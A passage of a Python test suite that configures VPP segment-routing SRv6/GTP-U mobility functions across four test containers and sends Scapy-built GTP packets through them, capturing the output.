c4 = self.containers.get(self.get_name(self.instance_names[-1]))
c1.pg_create_interface4(
local_ip="172.16.0.1/30",
remote_ip="172.16.0.2/30",
local_mac="aa:bb:cc:dd:ee:01",
remote_mac="aa:bb:cc:dd:ee:02")
c4.pg_create_interface4(
local_ip="1.0.0.2/30",
remote_ip="1.0.0.1",
local_mac="aa:bb:cc:dd:ee:11",
remote_mac="aa:bb:cc:dd:ee:22")
c1.vppctl_exec("set sr encaps source addr A1::1")
c1.vppctl_exec(
"sr policy add bsid D1:: next D2:: next D3:: "
"gtp4_removal sr_prefix D4::/32 v6src_prefix C1::/64")
c1.vppctl_exec("sr steer l3 172.20.0.1/32 via bsid D1::")
c2.vppctl_exec("sr localsid address D2:: behavior end")
c3.vppctl_exec("sr localsid address D3:: behavior end")
c4.vppctl_exec(
"sr localsid prefix D4::/32 "
"behavior end.m.gtp4.e v4src_position 64")
c2.set_ipv6_route("eth2", "A2::2", "D3::/128")
c2.set_ipv6_route("eth1", "A1::1", "C::/120")
c3.set_ipv6_route("eth2", "A3::2", "D4::/32")
c3.set_ipv6_route("eth1", "A2::1", "C::/120")
c4.set_ip_pgroute("pg0", "1.0.0.1", "172.20.0.1/32")
p = (Ether(src="aa:bb:cc:dd:ee:02", dst="aa:bb:cc:dd:ee:01") /
IP(src="172.20.0.2", dst="172.20.0.1") /
UDP(sport=2152, dport=2152) /
GTP_U_Header(gtp_type="g_pdu", teid=200) /
GTPPDUSessionContainer(R=1, QFI=3) /
IP(src="172.99.0.1", dst="172.99.0.2") /
ICMP())
print("Sending packet on {}:".format(c1.name))
p.show2()
c1.enable_trace(10)
c4.enable_trace(10)
c4.pg_start_capture()
c1.pg_create_stream(p)
c1.pg_enable()
# timeout (sleep) if needed
print("Sleeping")
time.sleep(5)
print("Receiving packet on {}:".format(c4.name))
for p in c4.pg_read_packets():
p.show2()
def test_tmap_ipv6(self):
# TESTS:
# trace add af-packet-input 10
# pg interface on c1 172.20.0.1
# pg interface on c4 B::1/120
self.start_containers()
c1 = self.containers.get(self.get_name(self.instance_names[0]))
c2 = self.containers.get(self.get_name(self.instance_names[1]))
c3 = self.containers.get(self.get_name(self.instance_names[2]))
c4 = self.containers.get(self.get_name(self.instance_names[-1]))
c1.pg_create_interface4(
local_ip="172.16.0.1/30",
remote_ip="172.16.0.2/30",
local_mac="aa:bb:cc:dd:ee:01",
remote_mac="aa:bb:cc:dd:ee:02")
c4.pg_create_interface4(
local_ip="1.0.0.2/30",
remote_ip="1.0.0.1",
local_mac="aa:bb:cc:dd:ee:11",
remote_mac="aa:bb:cc:dd:ee:22")
c1.vppctl_exec("set sr encaps source addr A1::1")
c1.vppctl_exec(
"sr policy add bsid D1:: next D2:: next D3:: "
"gtp4_removal sr_prefix D4::/32 v6src_prefix C1::/64")
c1.vppctl_exec("sr steer l3 172.20.0.1/32 via bsid D1::")
c2.vppctl_exec("sr localsid address D2:: behavior end")
c3.vppctl_exec("sr localsid address D3:: behavior end")
c4.vppctl_exec(
"sr localsid prefix D4::/32 "
"behavior end.m.gtp4.e v4src_position 64")
c2.set_ipv6_route("eth2", "A2::2", "D3::/128")
c2.set_ipv6_route("eth1", "A1::1", "C::/120")
c3.set_ipv6_route("eth2", "A3::2", "D4::/32")
c3.set_ipv6_route("eth1", "A2::1", "C::/120")
c4.set_ip_pgroute("pg0", "1.0.0.1", "172.20.0.1/32")
p = (Ether(src="aa:bb:cc:dd:ee:02", dst="aa:bb:cc:dd:ee:01") /
IP(src="172.20.0.2", dst="172.20.0.1") /
UDP(sport=2152, dport=2152) /
GTP_U_Header(gtp_type="g_pdu", teid=200) /
IPv6(src="2001::1", dst="2002::1") /
ICMPv6EchoRequest())
print("Sending packet on {}:".format(c1.name))
p.show2()
c1.enable_trace(10)
c4.enable_trace(10)
c4.pg_start_capture()
c1.pg_create_stream(p)
c1.pg_enable()
# timeout (sleep) if needed
print("Sleeping")
time.sleep(5)
print("Receiving packet on {}:".format(c4.name))
for p in c4.pg_read_packets():
p.show2()
def test_tmap_ipv6_5g(self):
# TESTS:
# trace add af-packet-input 10
# pg interface on c1 172.20.0.1
# pg interface on c4 B::1/120
self.start_containers()
c1 = self.containers.get(self.get_name(self.instance_names[0]))
c2 = self.containers.get(self.get_name(self.instance_names[1]))
c3 = self.containers.get(self.get_name(self.instance_names[2]))
c4 = self.containers.get(self.get_name(self.instance_names[-1]))
c1.pg_create_interface4(
local_ip="172.16.0.1/30",
remote_ip="172.16.0.2/30",
local_mac="aa:bb:cc:dd:ee:01",
remote_mac="aa:bb:cc:dd:ee:02")
c4.pg_create_interface4(
local_ip="1.0.0.2/30",
remote_ip="1.0.0.1",
local_mac="aa:bb:cc:dd:ee:11",
remote_mac="aa:bb:cc:dd:ee:22")
c1.vppctl_exec("set sr encaps source addr A1::1")
c1.vppctl_exec(
"sr policy add bsid D1:: next D2:: next D3:: "
"gtp4_removal sr_prefix D4::/32 v6src_prefix C1::/64")
c1.vppctl_exec("sr steer l3 172.20.0.1/32 via bsid D1::")
c2.vppctl_exec("sr localsid address D2:: behavior end")
c3.vppctl_exec("sr localsid address D3:: behavior end")
c4.vppctl_exec(
"sr localsid prefix D4::/32 "
"behavior end.m.gtp4.e v4src_position 64")
c2.set_ipv6_route("eth2", "A2::2", "D3::/128")
c2.set_ipv6_route("eth1", "A1::1", "C::/120")
c3.set_ipv6_route("eth2", "A3::2", "D4::/32")
c3.set_ipv6_route("eth1", "A2::1", "C::/120")
c4.set_ip_pgroute("pg0", "1.0.0.1", "172.20.0.1/32")
p = (Ether(src="aa:bb:cc:dd:ee:02", dst="aa:bb:cc:dd:ee:01") /
IP(src="172.20.0.2", dst="172.20.0.1") /
UDP(sport=2152, dport=2152) /
GTP_U_Header(gtp_type="g_pdu", teid=200) /
GTPPDUSessionContainer(R=1, QFI=3) /
IPv6(src="2001::1", dst="2002::1") /
ICMPv6EchoRequest())
print("Sending packet on {}:".format(c1.name))
print("Sending packet on {}:".format(c1.name))
p.show2()
c1.enable_trace(10)
c4.enable_trace(10)
c4.pg_start_capture()
c1.pg_create_stream(p)
c1.pg_enable()
# timeout (sleep) if needed
print("Sleeping")
time.sleep(5)
print("Receiving packet on {}:".format(c4.name))
for p in c4.pg_read_packets():
p.show2()
'''
def test_gtp4(self):
# TESTS:
# trace add af-packet-input 10
# pg interface on c1 172.20.0.1
# pg interface on c4 B::1/120
self.start_containers()
c1 = self.containers.get(self.get_name(self.instance_names[0]))
c2 = self.containers.get(self.get_name(self.instance_names[1]))
c3 = self.containers.get(self.get_name(self.instance_names[2]))
c4 = self.containers.get(self.get_name(self.instance_names[-1]))
c1.pg_create_interface4(
local_ip="172.16.0.1/30",
remote_ip="172.16.0.2/30",
local_mac="aa:bb:cc:dd:ee:01",
remote_mac="aa:bb:cc:dd:ee:02")
c4.pg_create_interface4(
local_ip="1.0.0.2/30",
remote_ip="1.0.0.1",
local_mac="aa:bb:cc:dd:ee:11",
remote_mac="aa:bb:cc:dd:ee:22")
c1.vppctl_exec("set sr encaps source addr A1::1")
c1.vppctl_exec("sr policy add bsid D4:: next D2:: next D3::")
c1.vppctl_exec("sr policy add bsid D5:: behavior t.m.gtp4.d D4::/32 v6src_prefix C1::/64 nhtype ipv4")
c1.vppctl_exec("sr steer l3 172.20.0.1/32 via bsid D5::")
c2.vppctl_exec("sr localsid address D2:: behavior end")
c3.vppctl_exec("sr localsid address D3:: behavior end")
c4.vppctl_exec(
"sr localsid prefix D4::/32 "
"behavior end.m.gtp4.e v4src_position 64")
c2.set_ipv6_route("eth2", "A2::2", "D3::/128")
c2.set_ipv6_route("eth1", "A1::1", "C::/120")
c3.set_ipv6_route("eth2", "A3::2", "D4::/32")
c3.set_ipv6_route("eth1", "A2::1", "C::/120")
c4.set_ip_pgroute("pg0", "1.0.0.1", "172.20.0.1/32")
p = (Ether(src="aa:bb:cc:dd:ee:02", dst="aa:bb:cc:dd:ee:01") /
IP(src="172.20.0.2", dst="172.20.0.1") /
UDP(sport=2152, dport=2152) /
GTP_U_Header(gtp_type="g_pdu", teid=200) /
IP(src="172.99.0.1", dst="172.99.0.2") /
ICMP())
print("Sending packet on {}:".format(c1.name))
p.show2()
time.sleep(10)
c1.enable_trace(10)
c4.enable_trace(10)
c4.pg_start_capture()
c1.pg_create_stream(p)
c1.pg_enable()
# timeout (sleep) if needed
print("Sleeping")
time.sleep(5)
print("Receiving packet on {}:".format(c4.name))
for p in c4.pg_read_packets():
p.show2()
def test_gtp4_usid(self):
# TESTS:
# trace add af-packet-input 10
# pg interface on c1 172.20.0.1
# pg interface on c4 B::1/120
self.start_containers()
c1 = self.containers.get(self.get_name(self.instance_names[0]))
c2 = self.containers.get(self.get_name(self.instance_names[1]))
c3 = self.containers.get(self.get_name(self.instance_names[2]))
c4 = self.containers.get(self.get_name(self.instance_names[-1]))
c1.pg_create_interface4(
local_ip="172.16.0.1/30",
remote_ip="172.16.0.2/30",
local_mac="aa:bb:cc:dd:ee:01",
remote_mac="aa:bb:cc:dd:ee:02")
c4.pg_create_interface4(
local_ip="1.0.0.2/30",
remote_ip="1.0.0.1",
local_mac="aa:bb:cc:dd:ee:11",
remote_mac="aa:bb:cc:dd:ee:22")
c1.vppctl_exec("set sr encaps source addr A1::1")
c1.vppctl_exec("sr policy add bsid D4:: next D2:1111:aaaa:bbbb::")
c1.vppctl_exec("sr policy add bsid D5:: behavior t.m.gtp4.d D4::/32 v6src_prefix C1::/64 nhtype ipv4")
c1.vppctl_exec("sr steer l3 172.20.0.1/32 via bsid D5::")
c2.vppctl_exec("sr localsid prefix D2:1111:aaaa::/48 behavior end usid 16")
c3.vppctl_exec("sr localsid prefix D2:1111:bbbb::/48 behavior end usid 16")
c4.vppctl_exec(
"sr localsid prefix D4::/32 "
"behavior end.m.gtp4.e v4src_position 64")
c2.set_ipv6_route("eth2", "A2::2", "D2:1111:bbbb::/48")
c2.set_ipv6_route("eth1", "A1::1", "C::/120")
c3.set_ipv6_route("eth2", "A3::2", "D4::/32")
c3.set_ipv6_route("eth1", "A2::1", "C::/120")
c4.set_ip_pgroute("pg0", "1.0.0.1", "172.20.0.1/32")
p = (Ether(src="aa:bb:cc:dd:ee:02", dst="aa:bb:cc:dd:ee:01") /
IP(src="172.20.0.2", dst="172.20.0.1") /
UDP(sport=2152, dport=2152) /
GTP_U_Header(gtp_type="g_pdu", teid=200) /
IP(src="172.99.0.1", dst="172.99.0.2") /
ICMP())
print("Sending packet on {}:".format(c1.name))
p.show2()
time.sleep(10)
c1.enable_trace(10)
c4.enable_trace(10)
c4.pg_start_capture()
c1.pg_create_stream(p)
c1.pg_enable()
# timeout (sleep) if needed
print("Sleeping")
time.sleep(5)
print("Receiving packet on {}:".format(c4.name))
for p in c4.pg_read_packets():
p.show2()
def test_gtp4_5g(self):
# TESTS:
# trace add af-packet-input 10
# pg interface on c1 172.20.0.1
# pg interface on c4 B::1/120
self.start_containers()
c1 = self.containers.get(self.get_name(self.instance_names[0]))
c2 = self.containers.get(self.get_name(self.instance_names[1]))
c3 = self.containers.get(self.get_name(self.instance_names[2]))
c4 = self.containers.get(self.get_name(self.instance_names[-1]))
c1.pg_create_interface4(
local_ip="172.16.0.1/30",
remote_ip="172.16.0.2/30",
local_mac="aa:bb:cc:dd:ee:01",
remote_mac="aa:bb:cc:dd:ee:02")
c4.pg_create_interface4(
local_ip="1.0.0.2/30",
remote_ip="1.0.0.1",
local_mac="aa:bb:cc:dd:ee:11",
remote_mac="aa:bb:cc:dd:ee:22")
c1.vppctl_exec("set sr encaps source addr A1::1")
c1.vppctl_exec("sr policy add bsid D4:: next D2:: next D3::")
c1.vppctl_exec("sr policy add bsid D5:: behavior t.m.gtp4.d D4::/32 v6src_prefix C1::/64 nhtype ipv4")
c1.vppctl_exec("sr steer l3 172.20.0.1/32 via bsid D5::")
c2.vppctl_exec("sr localsid address D2:: behavior end")
c3.vppctl_exec("sr localsid address D3:: behavior end")
c4.vppctl_exec(
"sr localsid prefix D4::/32 "
"behavior end.m.gtp4.e v4src_position 64")
c2.set_ipv6_route("eth2", "A2::2", "D3::/128")
c2.set_ipv6_route("eth1", "A1::1", "C::/120")
c3.set_ipv6_route("eth2", "A3::2", "D4::/32")
c3.set_ipv6_route("eth1", "A2::1", "C::/120")
c4.set_ip_pgroute("pg0", "1.0.0.1", "172.20.0.1/32")
p = (Ether(src="aa:bb:cc:dd:ee:02", dst="aa:bb:cc:dd:ee:01") /
IP(src="172.20.0.2", dst="172.20.0.1") /
UDP(sport=2152, dport=2152) /
GTP_U_Header(gtp_type="g_pdu", teid=200) /
GTPPDUSessionContainer(type=1, R=1, QFI=3) /
IP(src="172.99.0.1", dst="172.99.0.2") /
ICMP())
print("Sending packet on {}:".format(c1.name))
p.show2()
c1.enable_trace(10)
c4.enable_trace(10)
c4.pg_start_capture()
c1.pg_create_stream(p)
c1.pg_enable()
# timeout (sleep) if needed
print("Sleeping")
time.sleep(5)
print("Receiving packet on {}:".format(c4.name))
for p in c4.pg_read_packets():
p.show2()
def test_gtp4_echo(self):
# TESTS:
# trace add af-packet-input 10
# pg interface on c1 172.20.0.1
# pg interface on c4 B::1/120
self.start_containers()
c1 = self.containers.get(self.get_name(self.instance_names[0]))
c2 = self.containers.get(self.get_name(self.instance_names[1]))
c3 = self.containers.get(self.get_name(self.instance_names[2]))
c4 = self.containers.get(self.get_name(self.instance_names[-1]))
c1.pg_create_interface4(
local_ip="172.16.0.1/30",
remote_ip="172.16.0.2/30",
local_mac="aa:bb:cc:dd:ee:01",
remote_mac="aa:bb:cc:dd:ee:02")
c4.pg_create_interface4(
local_ip="1.0.0.2/30",
remote_ip="1.0.0.1",
local_mac="aa:bb:cc:dd:ee:11",
remote_mac="aa:bb:cc:dd:ee:22")
c1.vppctl_exec("set sr encaps source addr A1::1")
c1.vppctl_exec("sr policy add bsid D4:: next D2:: next D3::")
c1.vppctl_exec("sr policy add bsid D5:: behavior t.m.gtp4.d D4::/32 v6src_prefix C1::/64 nhtype ipv4")
c1.vppctl_exec("sr steer l3 172.20.0.1/32 via bsid D5::")
c2.vppctl_exec("sr localsid address D2:: behavior end")
c3.vppctl_exec("sr localsid address D3:: behavior end")
c4.vppctl_exec(
"sr localsid prefix D4::/32 "
"behavior end.m.gtp4.e v4src_position 64")
c2.set_ipv6_route("eth2", "A2::2", "D3::/128")
c2.set_ipv6_route("eth1", "A1::1", "C::/120")
c3.set_ipv6_route("eth2", "A3::2", "D4::/32")
c3.set_ipv6_route("eth1", "A2::1", "C::/120")
c4.set_ip_pgroute("pg0", "1.0.0.1", "172.20.0.1/32")
p = (Ether(src="aa:bb:cc:dd:ee:02", dst="aa:bb:cc:dd:ee:01") /
IP(src="172.20.0.2", dst="172.20.0.1") /
UDP(sport=2152, dport=2152) /
GTP_U_Header(gtp_type="echo_request", S=1, teid=200, seq=200))
print("Sending packet on {}:".format(c1.name))
p.show2()
c1.enable_trace(10)
c4.enable_trace(10)
c4.pg_start_capture()
c1.pg_create_stream(p)
c1.pg_enable()
# timeout (sleep) if needed
print("Sleeping")
time.sleep(5)
print("Receiving packet on {}:".format(c4.name))
for p in c4.pg_read_packets():
p.show2()
def test_gtp4_reply(self):
# TESTS:
# trace add af-packet-input 10
# pg interface on c1 172.20.0.1
# pg interface on c4 B::1/120
self.start_containers()
c1 = self.containers.get(self.get_name(self.instance_names[0]))
c2 = self.containers.get(self.get_name(self.instance_names[1]))
c3 = self.containers.get(self.get_name(self.instance_names[2]))
c4 = self.containers.get(self.get_name(self.instance_names[-1]))
c1.pg_create_interface4(
local_ip="172.16.0.1/30",
remote_ip="172.16.0.2/30",
local_mac="aa:bb:cc:dd:ee:01",
remote_mac="aa:bb:cc:dd:ee:02")
c4.pg_create_interface4(
local_ip="1.0.0.2/30",
remote_ip="1.0.0.1",
local_mac="aa:bb:cc:dd:ee:11",
remote_mac="aa:bb:cc:dd:ee:22")
c1.vppctl_exec("set sr encaps source addr A1::1")
c1.vppctl_exec("sr policy add bsid D4:: next D2:: next D3::")
c1.vppctl_exec("sr policy add bsid D5:: behavior t.m.gtp4.d D4::/32 v6src_prefix C1::/64 nhtype ipv4")
c1.vppctl_exec("sr steer l3 172.20.0.1/32 via bsid D5::")
c2.vppctl_exec("sr localsid address D2:: behavior end")
c3.vppctl_exec("sr localsid address D3:: behavior end")
c4.vppctl_exec(
"sr localsid prefix D4::/32 "
"behavior end.m.gtp4.e v4src_position 64")
c2.set_ipv6_route("eth2", "A2::2", "D3::/128")
c2.set_ipv6_route("eth1", "A1::1", "C::/120")
c3.set_ipv6_route("eth2", "A3::2", "D4::/32")
c3.set_ipv6_route("eth1", "A2::1", "C::/120")
c4.set_ip_pgroute("pg0", "1.0.0.1", "172.20.0.1/32")
p = (Ether(src="aa:bb:cc:dd:ee:02", dst="aa:bb:cc:dd:ee:01") /
IP(src="172.20.0.2", dst="172.20.0.1") /
UDP(sport=2152, dport=2152) /
GTP_U_Header(gtp_type="echo_response", S=1, teid=200, seq=200))
print("Sending packet on {}:".format(c1.name))
p.show2()
c1.enable_trace(10)
c4.enable_trace(10)
c4.pg_start_capture()
c1.pg_create_stream(p)
c1.pg_enable()
# timeout (sleep) if needed
print("Sleeping")
time.sleep(5)
print("Receiving packet on {}:".format(c4.name))
for p in c4.pg_read_packets():
p.show2()
def test_gtp4_error(self):
# TESTS:
# trace add af-packet-input 10
# pg interface on c1 172.20.0.1
# pg interface on c4 B::1/120
self.start_containers()
c1 = self.containers.get(self.get_name(self.instance_names[0]))
c2 = self.containers.get(self.get_name(self.instance_names[1]))
c3 = self.containers.get(self.get_name(self.instance_names[2]))
c4 = self.containers.get(self.get_name(self.instance_names[-1]))
c1.pg_create_interface4(
local_ip="172.16.0.1/30",
remote_ip="172.16.0.2/30",
local_mac="aa:bb:cc:dd:ee:01",
remote_mac="aa:bb:cc:dd:ee:02")
c4.pg_create_interface4(
local_ip="1.0.0.2/30",
remote_ip="1.0.0.1",
local_mac="aa:bb:cc:dd:ee:11",
remote_mac="aa:bb:cc:dd:ee:22")
c1.vppctl_exec("set sr encaps source addr A1::1")
c1.vppctl_exec("sr policy add bsid D4:: next D2:: next D3::")
c1.vppctl_exec("sr policy add bsid D5:: behavior t.m.gtp4.d D4::/32 v6src_prefix C1::/64 nhtype ipv4")
c1.vppctl_exec("sr steer l3 172.20.0.1/32 via bsid D5::")
c2.vppctl_exec("sr localsid address D2:: behavior end")
c3.vppctl_exec("sr localsid address D3:: behavior end")
c4.vppctl_exec(
"sr localsid prefix D4::/32 "
"behavior end.m.gtp4.e v4src_position 64")
c2.set_ipv6_route("eth2", "A2::2", "D3::/128")
c2.set_ipv6_route("eth1", "A1::1", "C::/120")
c3.set_ipv6_route("eth2", "A3::2", "D4::/32")
c3.set_ipv6_route("eth1", "A2::1", "C::/120")
c4.set_ip_pgroute("pg0", "1.0.0.1", "172.20.0.1/32")
p = (Ether(src="aa:bb:cc:dd:ee:02", dst="aa:bb:cc:dd:ee:01") /
IP(src="172.20.0.2", dst="172.20.0.1") /
UDP(sport=2152, dport=2152) /
GTP_U_Header(gtp_type="error_indication", S=1, teid=200, seq=200)/
IE_TEIDI(TEIDI=65535)/IE_GSNAddress(address="1.1.1.1")/
IE_PrivateExtension(extention_value="z"))
print("Sending packet on {}:".format(c1.name))
p.show2()
c1.enable_trace(10)
c4.enable_trace(10)
c4.pg_start_capture()
c1.pg_create_stream(p)
c1.pg_enable()
# timeout (sleep) if needed
print("Sleeping")
time.sleep(5)
print("Receiving packet on {}:".format(c4.name))
for p in c4.pg_read_packets():
p.show2()
def test_gtp4_ipv6(self):
# TESTS:
# trace add af-packet-input 10
# pg interface on c1 172.20.0.1
# pg interface on c4 B::1/120
self.start_containers()
c1 = self.containers.get(self.get_name(self.instance_names[0]))
c2 = self.containers.get(self.get_name(self.instance_names[1]))
c3 = self.containers.get(self.get_name(self.instance_names[2]))
c4 = self.containers.get(self.get_name(self.instance_names[-1]))
c1.pg_create_interface4(
local_ip="172.16.0.1/30",
remote_ip="172.16.0.2/30",
local_mac="aa:bb:cc:dd:ee:01",
remote_mac="aa:bb:cc:dd:ee:02")
c4.pg_create_interface4(
local_ip="1.0.0.2/30",
remote_ip="1.0.0.1",
local_mac="aa:bb:cc:dd:ee:11",
remote_mac="aa:bb:cc:dd:ee:22")
c1.vppctl_exec("set sr encaps source addr A1::1")
c1.vppctl_exec("sr policy add bsid D4:: next D2:: next D3::")
c1.vppctl_exec("sr policy add bsid D5:: behavior t.m.gtp4.d D4::/32 v6src_prefix C1::/64")
c1.vppctl_exec("sr steer l3 172.20.0.1/32 via bsid D5::")
c2.vppctl_exec("sr localsid address D2:: behavior end")
c3.vppctl_exec("sr localsid address D3:: behavior end")
c4.vppctl_exec(
"sr localsid prefix D4::/32 "
"behavior end.m.gtp4.e v4src_position 64")
c2.set_ipv6_route("eth2", "A2::2", "D3::/128")
c2.set_ipv6_route("eth1", "A1::1", "C::/120")
c3.set_ipv6_route("eth2", "A3::2", "D4::/32")
c3.set_ipv6_route("eth1", "A2::1", "C::/120")
c4.set_ip_pgroute("pg0", "1.0.0.1", "172.20.0.1/32")
p = (Ether(src="aa:bb:cc:dd:ee:02", dst="aa:bb:cc:dd:ee:01") /
IP(src="172.20.0.2", dst="172.20.0.1") /
UDP(sport=2152, dport=2152) /
GTP_U_Header(gtp_type="g_pdu", teid=200) /
IPv6(src="2001::1", dst="2002::1") /
ICMPv6EchoRequest())
print("Sending packet on {}:".format(c1.name))
p.show2()
c1.enable_trace(10)
c4.enable_trace(10)
c4.pg_start_capture()
c1.pg_create_stream(p)
c1.pg_enable()
# timeout (sleep) if needed
print("Sleeping")
time.sleep(5)
print("Receiving packet on {}:".format(c4.name))
for p in c4.pg_read_packets():
p.show2()
def test_gtp4_ipv6_5g(self):
# TESTS:
# trace add af-packet-input 10
# pg interface on c1 172.20.0.1
# pg interface on c4 B::1/120
self.start_containers()
c1 = self.containers.get(self.get_name(self.instance_names[0]))
c2 = self.containers.get(self.get_name(self.instance_names[1]))
c3 = self.containers.get(self.get_name(self.instance_names[2]))
c4 = self.containers.get(self.get_name(self.instance_names[-1]))
c1.pg_create_interface4(
local_ip="172.16.0.1/30",
remote_ip="172.16.0.2/30",
local_mac="aa:bb:cc:dd:ee:01",
remote_mac="aa:bb:cc:dd:ee:02")
c4.pg_create_interface4(
local_ip="1.0.0.2/30",
remote_ip="1.0.0.1",
local_mac="aa:bb:cc:dd:ee:11",
remote_mac="aa:bb:cc:dd:ee:22")
c1.vppctl_exec("set sr encaps source addr A1::1")
c1.vppctl_exec("sr policy add bsid D4:: next D2:: next D3::")
c1.vppctl_exec("sr policy add bsid D5:: behavior t.m.gtp4.d D4::/32 v6src_prefix C1::/64")
c1.vppctl_exec("sr steer l3 172.20.0.1/32 via bsid D5::")
c2.vppctl_exec("sr localsid address D2:: behavior end")
c3.vppctl_exec("sr localsid address D3:: behavior end")
c4.vppctl_exec(
"sr localsid prefix D4::/32 "
"behavior end.m.gtp4.e v4src_position 64")
c2.set_ipv6_route("eth2", "A2::2", "D3::/128")
c2.set_ipv6_route("eth1", "A1::1", "C::/120")
c3.set_ipv6_route("eth2", "A3::2", "D4::/32")
c3.set_ipv6_route("eth1", "A2::1", "C::/120")
c4.set_ip_pgroute("pg0", "1.0.0.1", "172.20.0.1/32")
p = (Ether(src="aa:bb:cc:dd:ee:02", dst="aa:bb:cc:dd:ee:01") /
IP(src="172.20.0.2", dst="172.20.0.1") /
UDP(sport=2152, dport=2152) /
GTP_U_Header(gtp_type="g_pdu", teid=200) /
GTPPDUSessionContainer(R=1, QFI=3) /
IPv6(src="2001::1", dst="2002::1") /
ICMPv6EchoRequest())
print("Sending packet on {}:".format(c1.name))
p.show2()
c1.enable_trace(10)
c4.enable_trace(10)
c4.pg_start_capture()
c1.pg_create_stream(p)
c1.pg_enable()
# timeout (sleep) if needed
print("Sleeping")
time.sleep(5)
print("Receiving packet on {}:".format(c4.name))
for p in c4.pg_read_packets():
p.show2()
def test_gtp6_drop_in(self):
# TESTS:
# trace add af-packet-input 10
# pg interface on c1 172.20.0.1
# pg interface on c4 B::1/120
self.start_containers()
print("Deleting the old containers...")
time.sleep(30)
print("Starting the new containers...")
c1 = self.containers.get(self.get_name(self.instance_names[0]))
c2 = self.containers.get(self.get_name(self.instance_names[1]))
c3 = self.containers.get(self.get_name(self.instance_names[2]))
c4 = self.containers.get(self.get_name(self.instance_names[-1]))
c1.pg_create_interface(
local_ip="C::1/120",
remote_ip="C::2",
local_mac="aa:bb:cc:dd:ee:01",
remote_mac="aa:bb:cc:dd:ee:02")
c4.pg_create_interface(
local_ip="B::1/120",
remote_ip="B::2",
local_mac="aa:bb:cc:dd:ee:11",
remote_mac="aa:bb:cc:dd:ee:22")
c1.vppctl_exec("set sr encaps source addr A1::1")
c1.vppctl_exec("sr policy add bsid D4:: next D2:: next D3::")
c1.vppctl_exec(
"sr localsid prefix D::/64 behavior end.m.gtp6.d.di D4::/64")
c2.vppctl_exec("sr localsid address D2:: behavior end")
c3.vppctl_exec("sr localsid address D3:: behavior end")
c4.vppctl_exec("sr localsid prefix D4::/64 behavior end.m.gtp6.e")
c2.set_ipv6_route("eth2", "A2::2", "D3::/128")
c2.set_ipv6_route("eth1", "A1::1", "C::/120")
c3.set_ipv6_route("eth2", "A3::2", "D4::/32")
c3.set_ipv6_route("eth1", "A2::1", "C::/120")
c4.set_ip_pgroute("pg0", "B::2", "D::2/128")
print("Waiting...")
time.sleep(30)
p = (Ether(src="aa:bb:cc:dd:ee:02", dst="aa:bb:cc:dd:ee:01") /
IPv6(src="C::2", dst="D::2") /
UDP(sport=2152, dport=2152) /
GTP_U_Header(gtp_type="g_pdu", teid=200) /
IP(src="172.99.0.1", dst="172.99.0.2") /
ICMP())
print("Sending packet on {}:".format(c1.name))
p.show2()
c1.enable_trace(10)
c4.enable_trace(10)
c4.pg_start_capture()
c1.pg_create_stream(p)
c1.pg_enable()
# timeout (sleep) if needed
print("Sleeping")
time.sleep(5)
print("Receiving packet on {}:".format(c4.name))
for p in c4.pg_read_packets():
p.show2()
def test_gtp6_drop_in_5g(self):
# TESTS:
# trace add af-packet-input 10
# pg interface on c1 172.20.0.1
# pg interface on c4 B::1/120
self.start_containers()
print("Deleting the old containers...")
time.sleep(30)
print("Starting the new containers...")
c1 = self.containers.get(self.get_name(self.instance_names[0]))
c2 = self.containers.get(self.get_name(self.instance_names[1]))
c3 = self.containers.get(self.get_name(self.instance_names[2]))
c4 = self.containers.get(self.get_name(self.instance_names[-1]))
c1.pg_create_interface(
local_ip="C::1/120",
remote_ip="C::2",
local_mac="aa:bb:cc:dd:ee:01",
remote_mac="aa:bb:cc:dd:ee:02")
c4.pg_create_interface(
local_ip="B::1/120",
remote_ip="B::2",
local_mac="aa:bb:cc:dd:ee:11",
remote_mac="aa:bb:cc:dd:ee:22")
c1.vppctl_exec("set sr encaps source addr A1::1")
c1.vppctl_exec("sr policy add bsid D4:: next D2:: next D3::")
c1.vppctl_exec(
"sr localsid prefix D::/64 behavior end.m.gtp6.d.di D4::/64")
c2.vppctl_exec("sr localsid address D2:: behavior end")
c3.vppctl_exec("sr localsid address D3:: behavior end")
c4.vppctl_exec("sr localsid prefix D4::/64 behavior end.m.gtp6.e")
c2.set_ipv6_route("eth2", "A2::2", "D3::/128")
c2.set_ipv6_route("eth1", "A1::1", "C::/120")
c3.set_ipv6_route("eth2", "A3::2", "D4::/32")
c3.set_ipv6_route("eth1", "A2::1", "C::/120")
c4.set_ip_pgroute("pg0", "B::2", "D::2/128")
print("Waiting...")
time.sleep(30)
p = (Ether(src="aa:bb:cc:dd:ee:02", dst="aa:bb:cc:dd:ee:01") /
IPv6(src="C::2", dst="D::2") /
UDP(sport=2152, dport=2152) /
GTP_U_Header(gtp_type="g_pdu", teid=200) /
GTPPDUSessionContainer(type=1, R=1, QFI=3) /
IP(src="172.99.0.1", dst="172.99.0.2") /
ICMP())
print("Sending packet on {}:".format(c1.name))
p.show2()
c1.enable_trace(10)
c4.enable_trace(10)
c4.pg_start_capture()
c1.pg_create_stream(p)
c1.pg_enable()
# timeout (sleep) if needed
print("Sleeping")
time.sleep(5)
print("Receiving packet on {}:".format(c4.name))
for p in c4.pg_read_packets():
p.show2()
def test_gtp6_drop_in_echo(self):
# TESTS:
# trace add af-packet-input 10
# pg interface on c1 172.20.0.1
# pg interface on c4 B::1/120
self.start_containers()
print("Deleting the old containers...")
time.sleep(30)
print("Starting the new containers...")
c1 = self.containers.get(self.get_name(self.instance_names[0]))
c2 = self.containers.get(self.get_name(self.instance_names[1]))
c3 = self.containers.get(self.get_name(self.instance_names[2]))
c4 = self.containers.get(self.get_name(self.instance_names[-1]))
c1.pg_create_interface(
local_ip="C::1/120",
remote_ip="C::2",
local_mac="aa:bb:cc:dd:ee:01",
remote_mac="aa:bb:cc:dd:ee:02")
c4.pg_create_interface(
local_ip="B::1/120",
remote_ip="B::2",
local_mac="aa:bb:cc:dd:ee:11",
remote_mac="aa:bb:cc:dd:ee:22")
c1.vppctl_exec("set sr encaps source addr A1::1")
c1.vppctl_exec("sr policy add bsid D4:: next D2:: next D3::")
c1.vppctl_exec(
"sr localsid prefix D::/64 behavior end.m.gtp6.d.di D4::/64")
c2.vppctl_exec("sr localsid address D2:: behavior end")
c3.vppctl_exec("sr localsid address D3:: behavior end")
c4.vppctl_exec("sr localsid prefix D4::/64 behavior end.m.gtp6.e")
c2.set_ipv6_route("eth2", "A2::2", "D3::/128")
c2.set_ipv6_route("eth1", "A1::1", "C::/120")
c3.set_ipv6_route("eth2", "A3::2", "D4::/32")
c3.set_ipv6_route("eth1", "A2::1", "C::/120")
